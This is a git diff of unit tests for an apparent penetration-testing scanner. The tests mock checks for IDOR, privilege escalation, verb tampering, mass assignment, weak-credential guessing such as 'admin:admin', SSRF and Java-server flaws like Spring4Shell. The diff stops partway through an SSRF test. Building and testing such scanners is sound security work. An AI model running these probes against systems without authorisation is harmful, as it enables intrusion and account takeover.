TestBatch4JavaGapFixes(unittest.TestCase): """Tests for batch 4: Java application servers, Struts2, WebLogic, Spring.""" @@ -6758,7 +4464,7 @@ def fake_get(url, **kwargs): resp.text = 'WebLogic login page' return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7102) findings = result.get("findings", []) @@ -6792,7 +4498,7 @@ def fake_get(url, **kwargs): resp.text = "Unauthorized" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7104) findings = result.get("findings", []) @@ -6823,7 +4529,7 @@ def fake_get(url, **kwargs): resp.text = "JMX Console" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7106) findings = result.get("findings", []) @@ -6853,7 +4559,7 @@ def fake_get(url, **kwargs): resp.text = '

    Whitelabel Error Page

    ' return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7108) findings = result.get("findings", []) @@ -6879,7 +4585,7 @@ def fake_get(url, **kwargs): resp.text = "Normal page" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ognl_injection("1.2.3.4", 7100) findings = result.get("findings", []) @@ -6906,7 +4612,7 @@ def fake_get(url, **kwargs): resp.headers = {"Content-Type": "text/xml"} return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_java_deserialization("1.2.3.4", 7102) findings = result.get("findings", []) @@ -6928,7 +4634,7 @@ def fake_get(url, **kwargs): resp.text = "Internal Server Error" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_java_deserialization("1.2.3.4", 7106) findings = result.get("findings", []) @@ -6969,8 +4675,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7000,8 +4706,8 @@ def fake_post(url, **kwargs): resp.text = '{"error":"SpelEvaluationException: evaluation failed"}' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7109) findings = result.get("findings", []) @@ -7039,8 +4745,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_java_servers("1.2.3.4", 7101) findings = result.get("findings", []) @@ -7081,8 +4787,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_java_servers("1.2.3.4", 7101) findings = result.get("findings", []) @@ -7128,8 +4834,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_java_servers("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7169,8 +4875,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7178,6 +4884,7 @@ def fake_post(url, **kwargs): self.assertTrue(any("Spring4Shell" in t for t in titles), f"Should detect Spring4Shell via binding error. Got: {titles}") + class TestBatch5Improvements(unittest.TestCase): """Tests for batch 5: Spring4Shell secondary gate, CVE dedup.""" @@ -7242,8 +4949,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7278,8 +4985,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7100) findings = result.get("findings", []) @@ -7291,7 +4998,7 @@ def fake_post(url, **kwargs): def _get_plugin_class(self): if 'extensions.business.cybersec.red_mesh.pentester_api_01' not in sys.modules: - TestPhase1ConfigCID._mock_plugin_modules() + mock_plugin_modules() from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin return PentesterApi01Plugin @@ -7416,35 +5123,3 @@ def test_jetty_all_cves_match(self): expected = {"CVE-2023-26048", "CVE-2023-26049", "CVE-2023-36478", "CVE-2023-40167"} self.assertEqual(cve_ids, expected, f"Should match all 4 Jetty CVEs, got {cve_ids}") - -class VerboseResult(unittest.TextTestResult): - def addSuccess(self, test): - super().addSuccess(test) - self.stream.writeln() # emits an extra "\n" after the usual "ok" - -if __name__ == "__main__": - runner = unittest.TextTestRunner(verbosity=2, resultclass=VerboseResult) - suite = unittest.TestSuite() - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(RedMeshOWASPTests)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestFindingsModule)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestCveDatabase)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestCorrelationEngine)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestScannerEnhancements)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase1ConfigCID)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase2PassFinalization)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase4UiAggregate)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase3Archive)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase5Endpoints)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase12LiveProgress)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase14Purge)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase15Listing)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase16ScanMetrics)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase17aQuickWins)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase17bMediumFeatures)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestOWASPFullCoverage)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestDetectionGapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch2GapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch3GapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch4JavaGapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch5Improvements)) - runner.run(suite) diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_access.py b/extensions/business/cybersec/red_mesh/tests/test_probes_access.py new file mode 100644 index 00000000..39ac1c1a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_access.py @@ -0,0 +1,332 @@ +"""Tests for AccessControlProbes.""" + +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.graybox.probes.access_control import AccessControlProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, AccessControlConfig, IdorEndpoint, AdminEndpoint, + BusinessLogicConfig, RecordEndpoint, +) + + +def _mock_response(status=200, text="", content_type="application/json", json_data=None): + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.headers = {"content-type": content_type} + resp.json.return_value = json_data or {} + return resp + + +def _make_probe(idor_endpoints=None, admin_endpoints=None, + regular_username="alice", discovered_routes=None, + regular_session=None, allow_stateful=False): + cfg = GrayboxTargetConfig( + access_control=AccessControlConfig( + idor_endpoints=idor_endpoints or [], + admin_endpoints=admin_endpoints or [], + ), + ) + auth = MagicMock() + auth.regular_session = regular_session or MagicMock() + safety = MagicMock() + safety.throttle = MagicMock() + + probe = AccessControlProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + discovered_routes=discovered_routes or [], + regular_username=regular_username, + allow_stateful=allow_stateful, + ) + return probe + + +class TestIdorProbe(unittest.TestCase): + + def test_idor_confirmed(self): + """Owner mismatch → vulnerable/HIGH.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[99], owner_field="owner") + probe = _make_probe(idor_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob", "data": "secret"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob", "data": "secret"} + + findings = probe.run() + vuln = [f for f in findings if f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].scenario_id, "PT-A01-01") + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-639", vuln[0].cwe) + + def test_idor_not_vulnerable(self): + """All owners match logged-in user → not_vulnerable/INFO.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[1], owner_field="owner") + probe = _make_probe(idor_endpoints=[ep], regular_username="alice") + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "alice"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "alice"} + + findings = probe.run() + clean = [f for f in findings if f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + self.assertEqual(clean[0].scenario_id, "PT-A01-01") + + def test_idor_one_finding_per_scenario(self): + """Multiple endpoints → exactly one finding.""" + eps = [ + IdorEndpoint(path="/api/records/{id}/", test_ids=[1, 2], owner_field="owner"), + IdorEndpoint(path="/api/users/{id}/", test_ids=[1], owner_field="owner"), + ] + probe = _make_probe(idor_endpoints=eps) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob"} + + findings = probe.run() + a01_findings = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01_findings), 1) + + def test_idor_no_regular_username(self): + """Returns without findings when regular_username is empty.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[1]) + probe = _make_probe(idor_endpoints=[ep], regular_username="") + findings = probe.run() + # No PT-A01-01 findings at all (no vulnerable, no not_vulnerable) + a01 = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01), 0) + + def test_idor_inference(self): + """/api/records/1/ inferred from discovered routes.""" + probe = _make_probe( + discovered_routes=["/api/records/1/", "/api/records/2/", "/about/"], + ) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob"} + + findings = probe.run() + a01 = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01), 1) + self.assertEqual(a01[0].status, "vulnerable") + + def test_idor_no_endpoints(self): + """No endpoints and no discoverable routes → no findings, no error.""" + probe = _make_probe(idor_endpoints=[], discovered_routes=[]) + findings = probe.run() + a01 = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01), 0) + + +class TestPrivilegeEscProbe(unittest.TestCase): + + def test_privilege_esc_confirmed(self): + """Admin endpoint + content markers → vulnerable/HIGH.""" + ep = AdminEndpoint( + path="/api/admin/users/", + method="GET", + content_markers=["email", "role"], + ) + probe = _make_probe(admin_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + status=200, + text='{"email": "admin@x.com", "role": "superuser"}', + content_type="text/html", + ) + + findings = probe.run() + vuln = [f for f in findings if f.scenario_id == "PT-A01-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + + def test_privilege_esc_inconclusive(self): + """200 but no content markers → inconclusive/LOW.""" + ep = AdminEndpoint( + path="/api/admin/users/", + method="GET", + content_markers=["secret_data"], + ) + probe = _make_probe(admin_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + status=200, + text="Welcome", + content_type="text/html", + ) + + findings = probe.run() + inc = [f for f in findings if f.scenario_id == "PT-A01-02" and f.status == "inconclusive"] + self.assertEqual(len(inc), 1) + self.assertEqual(inc[0].severity, "LOW") + + def test_privilege_esc_denial_body(self): + """200 + 'access denied' in body → skip (no finding).""" + ep = AdminEndpoint( + path="/api/admin/users/", + method="GET", + content_markers=["email"], + ) + probe = _make_probe(admin_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + status=200, + text="Access Denied. You are not authorized.", + content_type="text/html", + ) + + findings = probe.run() + a02 = [f for f in findings if f.scenario_id == "PT-A01-02"] + self.assertEqual(len(a02), 0) + + +class TestCapabilityDeclarations(unittest.TestCase): + + def test_capabilities(self): + """AccessControlProbes declares correct capabilities.""" + self.assertTrue(AccessControlProbes.requires_auth) + self.assertTrue(AccessControlProbes.requires_regular_session) + self.assertFalse(AccessControlProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All emitted findings are GrayboxFinding instances.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[1]) + probe = _make_probe(idor_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob"} + + findings = probe.run() + for f in findings: + self.assertIsInstance(f, GrayboxFinding) + + +class TestVerbTampering(unittest.TestCase): + + def test_verb_tampering_bypass(self): + """Admin endpoint denies GET but accepts PUT → vulnerable/HIGH.""" + ep = AdminEndpoint(path="/api/admin/users/", method="GET") + probe = _make_probe(admin_endpoints=[ep]) + session = probe.auth.regular_session + + # Baseline GET → 403 + baseline = _mock_response(status=403, text="Forbidden") + # PUT → 200 (bypass) + bypass = _mock_response(status=200, text='{"users": []}') + + call_count = [0] + def mock_request(method, url, **kwargs): + call_count[0] += 1 + if method == "GET": + return baseline + return bypass + + session.request = MagicMock(side_effect=mock_request) + + probe._test_verb_tampering() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A01-03" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-650", vuln[0].cwe) + + def test_verb_tampering_all_denied(self): + """All methods return 403 → not_vulnerable.""" + ep = AdminEndpoint(path="/api/admin/users/", method="GET") + probe = _make_probe(admin_endpoints=[ep]) + session = probe.auth.regular_session + session.request = MagicMock(return_value=_mock_response(status=403, text="Forbidden")) + + probe._test_verb_tampering() + clean = [f for f in probe.findings if f.scenario_id == "PT-A01-03" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_verb_tampering_baseline_accessible(self): + """Endpoint already accessible via normal method → skip (not a tampering target).""" + ep = AdminEndpoint(path="/api/public/", method="GET") + probe = _make_probe(admin_endpoints=[ep]) + session = probe.auth.regular_session + session.request = MagicMock(return_value=_mock_response(status=200, text="Public data")) + + probe._test_verb_tampering() + a01_03 = [f for f in probe.findings if f.scenario_id == "PT-A01-03"] + self.assertEqual(len(a01_03), 0) + + def test_verb_tampering_no_endpoints(self): + """No admin endpoints → no findings.""" + probe = _make_probe(admin_endpoints=[]) + probe._test_verb_tampering() + self.assertEqual(len([f for f in probe.findings if f.scenario_id == "PT-A01-03"]), 0) + + +class TestMassAssignment(unittest.TestCase): + + def test_mass_assignment_detected(self): + """Privilege field persisted → vulnerable/HIGH.""" + probe = _make_probe(allow_stateful=True) + probe.discovered_forms = ["/profile/"] + session = probe.auth.regular_session + + form_html = '
    ' + # After POST, GET shows is_admin in response + verify_html = '
    ' + + call_count = [0] + def mock_get(url, **kwargs): + call_count[0] += 1 + if call_count[0] <= 1: + return _mock_response(status=200, text=form_html) + return _mock_response(status=200, text=verify_html) + + session.get = MagicMock(side_effect=mock_get) + session.post = MagicMock(return_value=_mock_response(status=302, text="")) + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_mass_assignment() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A04-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-915", vuln[0].cwe) + + def test_mass_assignment_rejected(self): + """Server rejects extra fields → not_vulnerable.""" + probe = _make_probe(allow_stateful=True) + probe.discovered_forms = ["/profile/"] + session = probe.auth.regular_session + + form_html = '
    ' + session.get = MagicMock(return_value=_mock_response(status=200, text=form_html)) + session.post = MagicMock(return_value=_mock_response( + status=200, text="
    Unknown field
    ", + )) + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_mass_assignment() + clean = [f for f in probe.findings if f.scenario_id == "PT-A04-01" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_mass_assignment_gated(self): + """Skipped when allow_stateful=False → inconclusive.""" + probe = _make_probe(allow_stateful=False) + findings = probe.run() + skip = [f for f in findings if f.scenario_id == "PT-A04-01" and f.status == "inconclusive"] + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0].evidence) + + def test_mass_assignment_no_forms(self): + """No forms → no findings.""" + probe = _make_probe(allow_stateful=True) + probe.discovered_forms = [] + probe._test_mass_assignment() + self.assertEqual(len([f for f in probe.findings if f.scenario_id == "PT-A04-01"]), 0) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_business.py b/extensions/business/cybersec/red_mesh/tests/test_probes_business.py new file mode 100644 index 00000000..6e4f651e --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_business.py @@ -0,0 +1,210 @@ +"""Tests for BusinessLogicProbes.""" + +import unittest +from unittest.mock import MagicMock, call + +from extensions.business.cybersec.red_mesh.graybox.probes.business_logic import BusinessLogicProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, BusinessLogicConfig, WorkflowEndpoint, +) +from extensions.business.cybersec.red_mesh.constants import GRAYBOX_MAX_WEAK_ATTEMPTS + + +def _mock_response(status=200, text="", headers=None): + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.headers = headers or {"content-type": "text/html"} + return resp + + +def _make_probe(workflow_endpoints=None, allow_stateful=False, + regular_session=None): + cfg = GrayboxTargetConfig( + business_logic=BusinessLogicConfig( + workflow_endpoints=workflow_endpoints or [], + ), + ) + auth = MagicMock() + auth.regular_session = regular_session or MagicMock() + auth.official_session = MagicMock() + auth.anon_session = MagicMock() + auth.target_url = "http://testapp.local:8000" + auth.target_config = cfg + safety = MagicMock() + safety.throttle = MagicMock() + safety.throttle_auth = MagicMock() + safety.clamp_attempts = MagicMock(side_effect=lambda x: min(x, GRAYBOX_MAX_WEAK_ATTEMPTS)) + + probe = BusinessLogicProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + allow_stateful=allow_stateful, + regular_username="alice", + ) + return probe + + +class TestStatefulGating(unittest.TestCase): + + def test_stateful_disabled(self): + """Returns inconclusive skip finding when stateful=False.""" + probe = _make_probe(allow_stateful=False) + findings = probe.run() + skip = [f for f in findings if f.scenario_id == "PT-A06-01" and f.status == "inconclusive"] + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0].evidence) + + def test_stateful_enabled(self): + """Runs workflow probe when stateful=True.""" + ep = WorkflowEndpoint(path="/api/orders/1/force-pay/", method="POST", expected_guard="403") + probe = _make_probe( + workflow_endpoints=[ep], + allow_stateful=True, + ) + # Simulate a successful bypass: POST returns 200 instead of 403 + probe.auth.regular_session.post.return_value = _mock_response( + status=200, text="Payment processed", + ) + probe.auth.regular_session.get.return_value = _mock_response(status=200, text="OK") + + findings = probe.run() + vuln = [f for f in findings if f.scenario_id == "PT-A06-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + + +class TestWeakAuth(unittest.TestCase): + + def test_weak_auth_budget(self): + """Respects hard cap from safety.clamp_attempts.""" + probe = _make_probe() + # Request more than max — should be clamped + probe.safety.clamp_attempts.side_effect = None + probe.safety.clamp_attempts.return_value = 3 + + # Provide 5 candidates but budget is 3 + candidates = ["u1:p1", "u2:p2", "u3:p3", "u4:p4", "u5:p5"] + probe.auth.try_credentials.return_value = None + + # Mock the lockout check + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=200, text="Login") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + probe.run_weak_auth(candidates, max_attempts=100) + # clamp_attempts was called with 100 + probe.safety.clamp_attempts.assert_called_with(100) + # try_credentials should be called at most 3 times + self.assertLessEqual(probe.auth.try_credentials.call_count, 3) + + def test_weak_auth_success(self): + """Weak cred found → vulnerable.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + mock_session = MagicMock() + mock_session.close = MagicMock() + + # First cred fails, second succeeds + probe.auth.try_credentials.side_effect = [None, mock_session] + + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=200, text="Login page") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + findings = probe.run_weak_auth(["admin:wrong", "admin:admin"], max_attempts=10) + vuln = [f for f in findings if f.scenario_id == "PT-A07-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-307", vuln[0].cwe) + + def test_weak_auth_lockout_429(self): + """429 response → abort + inconclusive.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + probe.auth.try_credentials.return_value = None + + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=429, text="Rate limited") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + findings = probe.run_weak_auth(["admin:test"], max_attempts=10) + lockout = [f for f in findings if f.scenario_id == "PT-A07-01" and f.status == "inconclusive"] + self.assertEqual(len(lockout), 1) + self.assertIn("Account lockout detected", lockout[0].title) + + def test_weak_auth_lockout_body(self): + """'account locked' in body → abort.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + probe.auth.try_credentials.return_value = None + + check_session = MagicMock() + check_session.get.return_value = _mock_response( + status=200, text="Your account locked due to too many failed attempts", + ) + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + findings = probe.run_weak_auth(["admin:test"], max_attempts=10) + lockout = [f for f in findings if f.scenario_id == "PT-A07-01" and f.status == "inconclusive"] + self.assertEqual(len(lockout), 1) + + def test_weak_auth_uses_public_api(self): + """Calls try_credentials, not _try_login.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + probe.auth.try_credentials.return_value = None + + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=200, text="Login") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + probe.run_weak_auth(["admin:pass"], max_attempts=5) + probe.auth.try_credentials.assert_called_once_with("admin", "pass") + + def test_weak_auth_empty_candidates(self): + """Empty candidate list → returns findings unchanged.""" + probe = _make_probe() + findings = probe.run_weak_auth([], max_attempts=10) + # No PT-A07-01 findings + a07 = [f for f in findings if f.scenario_id == "PT-A07-01"] + self.assertEqual(len(a07), 0) + + def test_weak_auth_skips_no_colon(self): + """Candidates without ':' separator are skipped.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + probe.run_weak_auth(["nocolon", "also_no_colon"], max_attempts=10) + probe.auth.try_credentials.assert_not_called() + + +class TestCapabilities(unittest.TestCase): + + def test_capabilities(self): + """BusinessLogicProbes declares correct capabilities.""" + self.assertTrue(BusinessLogicProbes.requires_auth) + self.assertTrue(BusinessLogicProbes.requires_regular_session) + self.assertTrue(BusinessLogicProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All findings are GrayboxFinding instances.""" + probe = _make_probe(allow_stateful=False) + findings = probe.run() + for f in findings: + self.assertIsInstance(f, GrayboxFinding) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_injection.py b/extensions/business/cybersec/red_mesh/tests/test_probes_injection.py new file mode 100644 index 00000000..88887638 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_injection.py @@ -0,0 +1,370 @@ +"""Tests for InjectionProbes.""" + +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.graybox.probes.injection import InjectionProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, InjectionConfig, SsrfEndpoint, +) + + +def _mock_response(status=200, text="", headers=None, content_type="text/html"): + resp = MagicMock() + resp.status_code = status + resp.text = text + h = {"content-type": content_type} + if headers: + h.update(headers) + resp.headers = h + return resp + + +def _make_probe(ssrf_endpoints=None, discovered_forms=None, + official_session=None, allow_stateful=False, + login_path="/auth/login/", logout_path="/auth/logout/"): + cfg = GrayboxTargetConfig( + injection=InjectionConfig(ssrf_endpoints=ssrf_endpoints or []), + login_path=login_path, + logout_path=logout_path, + ) + auth = MagicMock() + auth.official_session = official_session or MagicMock() + auth.anon_session = MagicMock() + auth.detected_csrf_field = None + auth.extract_csrf_value = MagicMock(return_value=None) + safety = MagicMock() + safety.throttle = MagicMock() + + probe = InjectionProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + discovered_forms=discovered_forms or [], + allow_stateful=allow_stateful, + ) + return probe + + +class TestSsrfProbe(unittest.TestCase): + + def test_ssrf_reflected(self): + """Callback in response body → vulnerable.""" + ep = SsrfEndpoint(path="/api/fetch/", param="url") + probe = _make_probe(ssrf_endpoints=[ep]) + session = probe.auth.official_session + + # Baseline + baseline_resp = _mock_response(status=200, text="nothing") + # Probe: reflected SSRF + probe_resp = _mock_response( + status=200, text="fetched: http://127.0.0.1:1/internal-probe data", + ) + session.get.side_effect = [baseline_resp, probe_resp] + + probe._test_ssrf() + vuln = [f for f in probe.findings if f.scenario_id == "PT-API7-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + self.assertIn("CWE-918", vuln[0].cwe) + + def test_ssrf_no_hit(self): + """Normal response → no finding.""" + ep = SsrfEndpoint(path="/api/fetch/", param="url") + probe = _make_probe(ssrf_endpoints=[ep]) + session = probe.auth.official_session + + resp = _mock_response(status=200, text="safe content") + 